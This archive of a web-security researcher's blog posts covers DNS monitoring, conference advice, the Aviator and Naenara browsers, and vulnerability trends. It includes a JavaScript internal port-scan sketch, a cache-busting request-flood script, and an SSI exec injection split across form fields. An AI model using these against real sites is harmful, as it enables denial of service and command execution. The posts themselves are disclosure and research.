Author Archives: Robert Hansen

About Robert Hansen

Robert Hansen is the Vice President of WhiteHat Labs at WhiteHat Security. He's the former Chief Executive of SecTheory and Falling Rock Networks, which focused on building a hardened OS. Mr. Hansen began his career in banner click fraud detection at ValueClick. Mr. Hansen has worked for Cable & Wireless doing managed security services, and for eBay as a Sr. Global Product Manager of Trust and Safety. Mr. Hansen contributes to and sits on the board of several startup companies. Mr. Hansen co-authored "XSS Exploits" from Syngress Publishing and wrote the eBook "Detecting Malice." Robert is a member of WASC, APWG, IACSP, and ISSA, and has contributed to several OWASP projects, including originating the XSS Cheat Sheet. He is also a mentor at TechStars. His passion is breaking web technologies to make them better. Robert can be found on Twitter @RSnake.

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of attacks against and hijackings of DNS, it occurred to me that most people really don’t know what to do about it. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Smaller companies in particular, which may have fewer customers or only accept comments through a website, may never know unless they happen to check, or until the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes, a Perl script) that can be run out of cron and monitor one or more hostname-to-IP-address pairs for sites that are critical to you. If anything changes, it’ll send you an alert via email. There are other tools that do the same or similar things, but this is another tool for your arsenal; and most importantly, dnstest is meant to be very lightweight and simple to use. You can download dnstest here.
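
The real dnstest is a Perl script, but the core check is simple enough to sketch. Here is a rough equivalent in Node.js; the hostname and expected addresses are hypothetical placeholders, and a real deployment would send email rather than just log:

// Minimal sketch of the dnstest idea (the actual tool is Perl, not Node.js).
// The hostname and expected addresses are hypothetical placeholders.
const dns = require('dns').promises;

const expected = {
  'www.example.com': ['93.184.216.34'],
};

async function check() {
  for (const [host, want] of Object.entries(expected)) {
    const got = await dns.resolve4(host).catch(() => []);
    if (got.length === 0 || got.some(ip => !want.includes(ip))) {
      // The real tool emails an alert; logging stands in for that here.
      console.error(`ALERT: ${host} resolved to [${got}] instead of [${want}]`);
    }
  }
}

check();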

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

How to Get Accepted at Blackhat

One of the most common questions I get asked in my role on the Review Board for the Blackhat security conference is, “How do I get my submission accepted?” It’s a fair question, and it’s understandable how the process would appear to be a total black box. But there is actually a fairly clear set of criteria that the board uses. We aren’t strict about these rules, and they can vary from Review Board member to Review Board member, but this is a pretty good list of things to think about when you’re submitting a talk:

  1. Make sure your content is original. This might seem obvious but it apparently isn’t to the vast majority of people who submit talks to Blackhat. Most of the submissions we receive are actually just re-hashes of other people’s presentations, either blatantly or inadvertently. Quite often people will try to package it as if they were the first ones to find it, even coming up with their own acronyms. This is a pretty sure-fire way to get rejected.
  2. Make sure your content impacts a lot of people. This is also often called the “marketing” requirement. Blackhat needs to get people to care about your presentation. If your wonderfully researched presentation filled with interesting technical detail impacts you and your friend but no one else in the world, frankly, we applaud you, but we can’t fill a room with a presentation like that. Ideally your research should impact everyone, but think big. If your parents wouldn’t care if they saw the impact of your research on the news, chances are no one else will either.
  3. Make sure you fill out the CFP completely. If you forget to fill fields out, we will reject you. So don’t leave anything blank.
  4. Make sure you fill out the CFP correctly. Your outline matters. The tags you use matter. When we ask you why this would be a good presentation don’t tell us because you like Blackhat. We appreciate that, but it’s important for you to actually answer the question. We read everything.
  5. Make us understand what you actually want to present. This might actually require some work on your part. We might be too dumb to grok your genius without some pretty pictures. But the short of it is if we don’t understand what you’re trying to say, we might assume you don’t either. Outlines are important for us to understand the flow of your presentation and see what kind of guidance we might want to give you. Make sure your outlines are as detailed as you can get. Don’t be afraid of writing a lot, we’ll read it.
  6. Respond to the board when they ask questions. If you don’t reply to us, we may have to assume you’ve gone radio silent and aren’t interested in talking anymore. If we ask you a question and you do respond, please respond with as much detail as possible. We often have to get clarity on the vulns you’re sending us to make sure there isn’t overlap with existing research or other people who are presenting. Don’t worry, we keep our mouths shut – we’re all under confidentiality agreements.
  7. Demos, tools and 0days are much beloved. If you have a demo, that’s great. If you’re going to actually release (not just show) a tool, that’s even better. But the best is when you give us 0day. That always draws a crowd! Unfortunately the harsh reality is that offensive research always draws more asses-into-seats than defensive research. However, we are going to start having a defense-only track just for people who are interested in it. But if you say you’re giving us an 0day and then tell us that you told the company and it’s now been fixed, that’s not exactly an 0day now is it? Call it what it is, a non-issue for anyone who has patched.
  8. Make sure you speak the language, or get a translator. We definitely want people from all over the world to come and present. But please make sure that you are fluent in the language, and feel confident you can deliver your presentation without reaching for the words. Worst case, we’ll get you a translator, but we need you to tell us that you need one.
  9. Make it technical. Technical presentations are the cornerstone of Blackhat. If you aren’t technical, you’ll have to really step up your game to get past that threshold. Keynotes, for instance, don’t have to be technical, and some legal discussions can miss that too. But you really should try to submit a talk that is technical. Don’t underestimate how technical the audience can be. At the same time, you’ll need to explain yourself to those who aren’t as technical. So make sure you understand it well enough to explain it to your audience when they ask questions.
  10. Don’t submit a sales pitch. If you are selling product, great. If you work for a company, great. If you give a presentation about your product features and your client list and pricing, etc… you’ll never speak at Blackhat again. If we get a whiff of you submitting a talk that is a sales pitch, you’ll get rejected. We really really don’t like that. Really.
  11. Don’t spam the review board. Occasionally someone from some big company gets the crazy idea to submit dozens of presentations that are all the same or nearly the same. You spent countless hours doing the research and writing up all of those submissions, and we rejected every one of them in 10 seconds without reading any of them. Don’t do it.
  12. Don’t ask for 3 hours when you can do it in 15 minutes. This is a tough one because so many presentations could go on forever with all of the issues related to them, but when in doubt go to the shorter time slot. We have more of the shorter slots so you’re more likely to get approved. If we see something is three hours we will do about three times the scrutiny of a one hour submission. It’s a big commitment to give someone a room for three hours, so if you’re going to ask for it you had better be able to back that up with three solid hours of good research.
  13. Be entertaining. Some people are just awesome. They’re charismatic, funny, well spoken, or just have amazing slides. Be that person. It helps.
  14. Don’t mess up! Just because you got accepted to Blackhat doesn’t mean you are instantly a hero. It’s actually more of a hard swallow followed by a “Dear lord, what have I just signed myself up for” moment. You now need to spend 2-4 months getting your research in order. People who don’t put that much time in almost always come across as under-prepared. People who don’t practice their presentation will naturally score lower. The reason you see researchers coming back to do more than one presentation is because they did good research and presented it well. If you mess up you’ll probably never speak at Blackhat again, or at least not until you up your game. I am proof that Blackhat forgives (I gave a not-so-hot presentation when I was very young), but my advice would be to not mess up in the first place.

Occasionally when I tell people what they need to do, they say things like, “I don’t really have anything that would get past that gauntlet.” To which I have to reply with the hard truth: we get many hundreds of submissions and reject most of them. Yes, some people are destined never to speak at Blackhat. But there are many other conferences out there for less-technical content.

I’m on review boards for several other conferences as well, and for the most part these rules still apply; the main difference is the types of presentations each conference is most interested in. So this is a fairly good rule of thumb for all up-and-coming presenters. We love new presenters. Some of the best presentations I’ve ever seen were by untested new presenters, so don’t think that you have to be a seasoned old-timer to get into Blackhat or really any other conference. Just make sure you’re as awesome as you can be! Also, be sure to check out Jer’s thoughts on the same topic for his take on things you should be thinking about.

That said, please submit!

The Imitation Game – A Review

Warning: Spoiler alert!

I went to see “The Imitation Game” this weekend, on a bit of a whim. I know Alan Turing’s story rather well; having spent a lot of time in computer security will do that to you. Overall I thought the movie was really good: the acting, the writing, and the general historical accuracy were all strong.

Pros:

  • The movie spent a lot of time talking about his personal life, and what led up to his suicide. I’d argue that this was as much a movie about the father of computers as it was about the historical (and unfortunately current) marginalization and criminalization of homosexuality.
  • I was impressed by how the movie explained keyspace reduction in rather plain English with simple examples. The math might be impenetrable for the average person, but they managed to make the idea accessible.
  • They mention the Turing test – though thankfully there were no CAPTCHAs in sight.
  • The movie spent quite a long time explaining why you cannot use a single signal to make any decisions, or the adversary will switch tactics and you’ll lose that one signal. I try to make this point all the time, and yet I still see people doing things like blocking countries at the firewall by IP address. If you are in security and you take nothing away from this movie, let it be this: do not use a single signal to identify and stop fraud/hacking. You’re hurting the ecosystem by doing so. Yes, you.

There were a couple of cons though… some of which actually made me cringe.

Cons:

  • At one point in the movie Alan Turing made the bear-in-the-woods joke. Just about the time my eyes started rolling, the audience burst into laughter; at that point I realized I was extremely jaded and should probably learn to live a little, hug a tree, run like a child, or generally do something other than wince at old security jokes. But the reason I hate this joke is that it presumes you can leave the woods once the bear has eaten your friend. Unless you plan to close up shop and leave the Internet, this analogy has always been a very dangerous one. Bears get stronger and will get hungry again, and if you’re relying on running faster than an adversary who is dead, you’re using the wrong analogy. I prefer the prairie dog analogy if you’re looking for silly analogies.
  • A big motivator throughout the movie was that at the end of the day a buzzer went off that meant that the Nazis had changed their encryption keys. So yesterday’s keys were “useless” and anything they had done had to be scrapped if they couldn’t complete it by midnight. Though it’s an interesting plot device it really doesn’t work that way. Decryption doesn’t stop at the end of the day, just because your key changes. If the adversary has the ciphertext and there is nothing ephemeral about the key, it can still be decrypted. Now if you’re going to make the point that the data loses value the longer it takes to decrypt – yes, I’m on board with that. But the movie didn’t explain that at all.
  • They don’t really talk about Turing’s other accomplishments, like the halting problem, which more or less describes the problem with blacklists and all kinds of other technologies. As a student of breaking crappy blacklists, I find this to be one of his most useful accomplishments for my daily life. I really wanted to hear them mention it at least once, like they did with the Turing test. Alas!

I’d also point out that there were some other controversies about the film’s historical accuracy that didn’t jump out at me as I watched it. Anyway, it was a really wonderful movie, despite the cons. I’d highly recommend it to people who want to know a bit more about our roots, and to get a bit more familiar with some of the core concepts that have brought us to where we are today. I love that we’re seeing more movies about real heroes and not the typical Hollywood-manufactured superhero.

Aviator Open Source (Day 1)

We got some interesting feedback from Google in just the first 24 hours of open sourcing Aviator to the community. Interestingly, one of our initial barometers of success was getting to the point where Google had to talk about us, so today was a milestone for us!

The post makes some interesting points about the architecture of our fixes, pointing out that we are behind Google on patches and that there are software security issues. Let me make it clear: we never claimed to be as fast as Google at releasing updates. In fact, that would be nearly impossible for a company of our size. Google gets the benefit of making in excess of $50 billion a year from ads by marketing its users to advertisers. Google therefore has a lot of vested interest in keeping the browser up to par and capable of delivering more ads to those users. To say we are outmatched is an understatement.

We decided to go open source with Aviator and thereby seek assistance from the community. All this being said, we would like to take a moment to respond to some of the points made in the post as well as respond to the advice that was shared:

  1. Yes, there are bugs in our code, just like there were bugs that we inherited from the Chromium code base.
  2. Yes, it is perhaps not as elegant a code base as Google Chrome’s; however, Chrome has bugs as well. That’s the nature of such a complex project. The nice thing about bugs is that they can be fixed.
  3. Advising users not to use Aviator misses the bigger picture. Telling people that if they use Chrome, add Disconnect, and change some privacy settings they’ll get the same thing as Aviator is not at all accurate. We have made changes in Aviator that go beyond configuration, such as stopping referring URLs from being sent cross-domain and always running in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what the post is suggesting. Most people do not know the first thing about Disconnect, and therefore don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.

Our reasoning for making Aviator open source was two-fold:

  1. We wanted to be honest with our users and give them a chance to see that we don’t have anything up our sleeves and that we are not (nor were we ever) hiding anything from them. Going open source is painful, but it is good for project transparency, something Google has long refused to do with Chrome. Chrome is not open source.
  2. We wanted to solve Google’s primary issue with us – the lack of development resources necessary to deliver the browser in a timely manner. That’s absolutely a real issue and we have never claimed otherwise. By making it available to the community, we believe that more time and resources will be put towards continuing to improve it and we are excited to see where the community takes it next.

The core issue in all of this is that we set out to create a browser that would provide security and privacy settings by default. We believe that we made very good strides in that effort and when issues around those settings were brought to our attention, we actively made changes, something that Google has been unwilling to do.

I won’t lie, going open source has been hard and only with the help of the community will Aviator continue to improve. It is now up to the community to decide if they’d rather hand over their privacy when they search using other browsers, or stand behind a project that we believe has the user’s best interests as a primary motivator. Only time will tell.

North Korea’s Naenara Web Browser: It’s Weirder Than We Thought

Naenara Browser is the DPRK’s version of Firefox that comes built into Red Star OS, the official operating system of North Korea. I recently got my hands on Naenara Browser version 3.5. My first impression in playing with it is that this is one ancient version of Firefox. Like maybe more than a half dozen major revisions out of date? It’s hard to tell for sure in cursory checking but the menus remind me of something I used to use 5+ years ago. That’s not too surprising; it’s tough to have a browser and update it all the time, especially with such a small team devoted to the project, as I’m sure they have a lot of other things going on.

When I first saw an image of the browser I was awe-struck to see that it made a request to an address (http://10.76.1.11/) upon first run. That may not mean much to someone who doesn’t deal with networks, but it’s a big deal if you want to know how North Korea’s Internet works.

If you want to send a request to a web address across the country, you need a hostname or an IP address. Hostnames convert to IP addresses through something called DNS. So if I want to contact www.whitehatsec.com, DNS will tell me to go to 63.128.163.3. But there are certain addresses, like those that start with “10.”, “192.168.” and a few others, that are reserved and meant only for internal networks; they are not designed to be routable on the Internet. This is sometimes used as a security mechanism to allow local machines to talk to one another when you don’t want them to traverse the Internet to do so.

Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office. The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!
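
To make that concrete, here is a quick sketch (in JavaScript, since more of that shows up later in this post) of a check for the reserved private ranges; 10.76.1.11, the address Naenara phones home to, sits squarely inside the 10.0.0.0/8 block:

// Quick sketch: is an IPv4 address inside one of the reserved private ranges
// (RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)?
function isPrivate(ip) {
  const [a, b] = ip.split('.').map(Number);
  return a === 10 ||                          // 10.0.0.0/8 (one class A: 16,777,216 addresses)
         (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
         (a === 192 && b === 168);            // 192.168.0.0/16
}

console.log(isPrivate('10.76.1.11'));   // true: not routable on the public Internet
console.log(isPrivate('63.128.163.3')); // false: a normal public address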

But it doesn’t stop there! No! No sirrreee… I started digging through their configuration settings and here are some gems:

  1. They use the same sort of unique-key tracking mechanism Google uses, except they built their own. That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into the browser.
  2. All crash reports are sent to the mothership (10.76.1.11). So every time the browser fails for some reason they get information about it. Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company.
  3. All news feeds go back to the mothership in a specially crafted URL: http://10.76.1.11/naenarabrowser/rss/?url=%s At first it was unclear whether that actually does anything, since we can’t reach the IP address, but it looks like it probably does act as a feed aggregator.
  4. Strangely, the browser adds “.com” instead of “.com.kp” as a suffix when it can’t find something. It’s odd because it means that in some cases the browser might accidentally contact external hosts when someone in the country mistypes something. A bad design choice, but perhaps meant for usability, since most things live on .com.
  5. There are quite a few references to “.php” on the mothership website. I would be unsurprised if most things on it were written in PHP.
  6. Then I spotted this little number: http://10.76.1.11/naenarabrowser/%LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ This is the warning that pops up when users turn on geolocation. But here’s the really crazy part: if you remove the DPRK specific URL part and just leave it as %LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ and substitute %LOCALE% with “ko” you end up on Mozilla’s site translated into Korean. Could the mothership be acting as a proxy? Is that how people are actually visiting the Internet – through a big proxy server? Can that really be true? It kind of makes sense to do it that way if you want to allow specific URLs through but not others on the same domain. Hm!
  7. More of the same. This time the safe browsing API that Google supports to find phishing/malware stuff — http://10.76.1.11/naenarabrowser/safebrowsing.clients.google.com/safebrowsing/diagnositc?client=%NAME%&hl=%LOCALE%&site= — if you remove the preceding part of the URL and fill in the variables it’s a real site. And there are a bunch more like this.
  8. Apparently they allow some forms of extensions, plugins and themes, though it’s not clear if this is the whole list or their own special brand of allowed add-ons: http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/extensions/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/plugins/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/themes/

  9. Apparently all of the mail from the country goes through a single mothership URL. It’s very strange to build it this way, and obviously vulnerable to man-in-the-middle attacks, sniffing and so on, but I guess no one in the DPRK has any secrets, or at least not over email: http://10.76.1.11/naenarabrowser/mail/?To=%s I found a reference to “evolution” with regard to mail, which means there is a good chance North Korea is using the Evolution mail project across the country.

  10. Same thing with calendaring? So many sensitive things end up in calendars, like passwords, Excel spreadsheets, etc., that it’s still very odd they haven’t bothered using HTTPS internally: http://10.76.1.11/naenarabrowser/webcal/?refer=ff&url=%s

  11. This one blew my mind. Either it’s a mistake or a bizarre quirk of the way the DPRK’s network works, but the wifi geolocation URL still points to https://www.google.com/loc/json. Not only is there no way for this to work, since Google hasn’t driven through the country with their wifi cars and the URL sits on the public Internet rather than behind their proxy of doom, but it’s also over HTTPS, meaning that even if it could be contacted, the DPRK might have a hard time seeing what is being sent. Would they allow outbound HTTPS? More questions than answers, it seems.
  12. The official Naenara search function isn’t Google, and it’s not even clear if it’s a proxy or not. But one thing makes me think it might be: it’s in UTF-8, and not something you might expect like BIG5 or ISO-2022-KR or SHIFT_JIS. http://10.76.1.11/se/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&keyword= But wait a tick, after a little digging I found a partial match on the URL: /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1 and where did I find this? Google. Are they proxying Google results? I think so! That means that depending on what Google can put on those pages, they could technically run JavaScript and read the DPRK’s email/calendars, etc. using XMLHttpRequest, since they are all on the same domain. Whoops!

  13. In looking at the certificates they support, I was not surprised to find that they accept no other certificates as valid, only their own. That means it would be trivial for them to man-in-the-middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and its contents can be monitored by them. Likewise, no other governments can man-in-the-middle any connections that the North Koreans have (I’m saying that with a bit of tongue in cheek, because of course they can according to WikiLeaks docs, but this probably makes the DPRK feel better; more importantly, they probably don’t know how to do it the way the NSA does, so they have to rely on draconian Internet-breaking concepts like this).

  14. The browser updates automatically, without letting the user disable that function. That’s actually a good security measure, but given how old this browser is, I doubt they use it often; it’s probably not designed to protect the user so much as to allow the government to quickly install malware should they feel the need. Wonderful.
  15. Even if the entire Internet is proxied through North Korean servers, and even if their user agent strings are filtered by the proxy, an adversary can still identify a Naenara user from JavaScript by reading navigator.userAgent (see the sketch after this list). Their user agent is “Mozilla/5.0 (X11; U; Linux i686; ko-KP; rv: 19.1br) Gecko/20130508 Fedora/1.9.1-2.5.rs3.0 NaenaraBrowser/3.5b4”. So if you see that user agent string in JavaScript you could target North Korean users rather easily.
  16. Although Red Star OS does lock things down, with a file manager that only shows you a few directories, the command-O (open) feature disabled, the omnibar removed and so on, it’s still possible to do whatever you want. Using the browser, users can go to file:/// to view files, and they can write their own JavaScript using javascript: directives, which gives them just about any access they want, if they know what they’re doing. Chances are they don’t, but despite the military’s best efforts, Red Star OS actually isn’t that locked down from a determined user’s perspective.
  17. The Snort intrusion detection system is installed by default. It’s either used as an actual security mechanism, as designed, or re-purposed as a way to constantly snoop on people’s computers to see what they are doing when they use the Internet. Even if it doesn’t necessarily phone home, the DPRK soldier who breaks down your door could fairly easily do forensics and see everything you had done, without relying on any IP correlation at the mothership. So using your neighbor’s wifi isn’t a safe alternative for a political dissident using Red Star OS.
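
To illustrate point 15, this is roughly all the JavaScript an attacker would need on any page a Red Star user visits. It’s a minimal sketch, not production fingerprinting code:

// Minimal sketch of the user agent check described in point 15. Any page the
// user visits can read this value from script, even if a proxy rewrites the
// User-Agent header on the wire.
var ua = navigator.userAgent;
if (ua.indexOf('NaenaraBrowser') !== -1 && ua.indexOf('ko-KP') !== -1) {
  // The visitor is almost certainly running Naenara on Red Star OS.
  console.log('Likely Naenara user: ' + ua);
}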

My ability to read Korean is non-existent, so I had to muddle my way through this quite a bit, but I think we have some very good clues as to how this browser, and more importantly how North Korea’s Internet, works, or doesn’t, as the case may be.

It is odd that they run all of this off of one IP address. Perhaps they have some load balancing behind it, but ultimately running everything for a whole country off of one IP address is bad for many reasons. Spreading the load with DNS would be far more resilient, but it would also make things slower in a country where Internet connectivity is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits off core functions by URL to various clusters of machines. A single set of F5s could easily handle this job for the entire country. It would be slow, but it doesn’t seem the country cares much about the comforts of fast Internet anyway.

Ultimately the most interesting takeaway for me personally was the lengths North Korea goes to in limiting what their people get to do, see and contribute to: censorship at the browser and network level, embodied in the OS called Red Star 3.0. It’s quite a feat of engineering. Creepy and cool. Download the Red Star OS here.

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need to, or lack the skills to, contribute to it. But we also received some really compelling questions from people with an active interest in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had already removed a lot of the Google-specific anti-privacy stuff than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team, the limits of licensing are no longer an issue, so that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; Aviator is now entirely community-driven. We’ll still sign the releases, QA them and push them to production, but the code itself will come from the community. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support for their products, but they regularly fail to take the step of open sourcing them. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SaaS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve, and something I personally feel all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

#HackerKast 14 Bonus Round: Canadian Beacon – JavaScript Beacon and Performance APIs

In this week’s bonus footage of HackerKast, I showed Matt my new JavaScript port scanning magic that I dubbed “Canadian Beacon” because it uses the new Beacon API (it was either that or Kevin Beacon; I had to make a tough choice with my puns). It utilizes both the Performance API and the Beacon API.

It shows how you can use iframes and the Performance API to do basically the same thing we used to do with onload event handlers on iframes in years past.
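
This isn’t the Canadian Beacon code itself, just a stripped-down sketch of the general timing idea: fire a request at an internal address and watch how quickly it settles. A host that actively refuses the connection tends to fail fast, while an address with nothing behind it tends to hang until a timeout. The target address below is a hypothetical placeholder, and the real tool leans on the Beacon and Performance APIs rather than a plain fetch:

// Simplified sketch of the timing idea, not the actual Canadian Beacon code.
// The internal address below is a hypothetical placeholder.
function probe(url) {
  var start = performance.now();
  return fetch(url, { mode: 'no-cors' })
    .catch(function () {})                  // network errors are expected; ignore them
    .then(function () {
      var elapsed = performance.now() - start;
      console.log(url + ' settled in ' + Math.round(elapsed) + ' ms');
      return elapsed;                       // a fast failure hints that something is listening
    });
}

probe('http://192.168.1.1/');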

Not a huge deal, because we can do this in a bunch of different ways already, but it shows how easy it is to do JavaScript port scanning; and even if someone bothers to shut one variant down, this and other variants will take its place. This is one of the major reasons we chose to have Aviator block access to RFC1918 addresses from the Internet.

Only a few browsers appear to be vulnerable (Chrome and apparently Firefox), though I only got it working in Chrome. If you want to see a demo you can check out Canadian Beacon here.

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to their extensive database of vulnerabilities gathered over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the first thing I notice is the nice upward trend as the web began to really take off, and then the real explosion of web application vulnerabilities in the mid-2000s. However, one thing that struck me as very odd is that we have been seeing a downward trend in reported web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch to something new, which means incumbent code is less likely to be replaced and new frameworks are less likely to get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves to the point where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The rise of bug bounties, where researchers get paid for disclosing a newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and should be watched carefully. It could be a hybrid of a number of these factors as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning they involve a remote attacker and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common as they have ever been, or even more so. Said another way, compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem not to understand how this works, or even that it’s possible, despite my multiple attempts to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain to the system.

What you might find, though, is that heavy database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter-value pairs each time to bypass caching servers like Varnish. An adversary is unlikely to run this kind of code directly, because the flood would come from their own IP address; it’s much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
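
This isn’t the FlashFlood code itself, just a minimal sketch of the cache-busting idea: every request carries a parameter pair the cache has never seen, so something like Varnish treats each URL as new and passes it through to the backend. The target URL is a hypothetical placeholder; obviously don’t point this at a site you don’t own:

// Minimal sketch of the cache-busting flood idea, not the FlashFlood code itself.
// The target URL is a hypothetical placeholder.
function flood(base, count) {
  for (var i = 0; i < count; i++) {
    var key = Math.random().toString(36).slice(2);          // a parameter name the cache has never seen
    var url = base + '?' + key + '=' + Date.now();
    fetch(url, { mode: 'no-cors' }).catch(function () {});  // fire and forget; ignore errors
  }
}

flood('http://example.com/', 50);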

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of today’s knowledge about web application security to 20-year-old tech? So I took a look at the message board, WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, a number of vulns have been found in it over the years – four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past Perl regexes if you allow nulls. But that second substitution makes me shudder a bit. The code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it up into two chunks that execute together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->
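
Run each half through that same kind of filter and neither one matches on its own; only the reassembled page contains a complete directive. Here’s a quick sketch of that check, re-expressed in JavaScript:

// The wwwboard filter runs per field, so neither half of the split SSI matches
// the <!-- ... --> pattern on its own; the reassembled page still contains a
// complete directive. (A JavaScript stand-in for the Perl regex above.)
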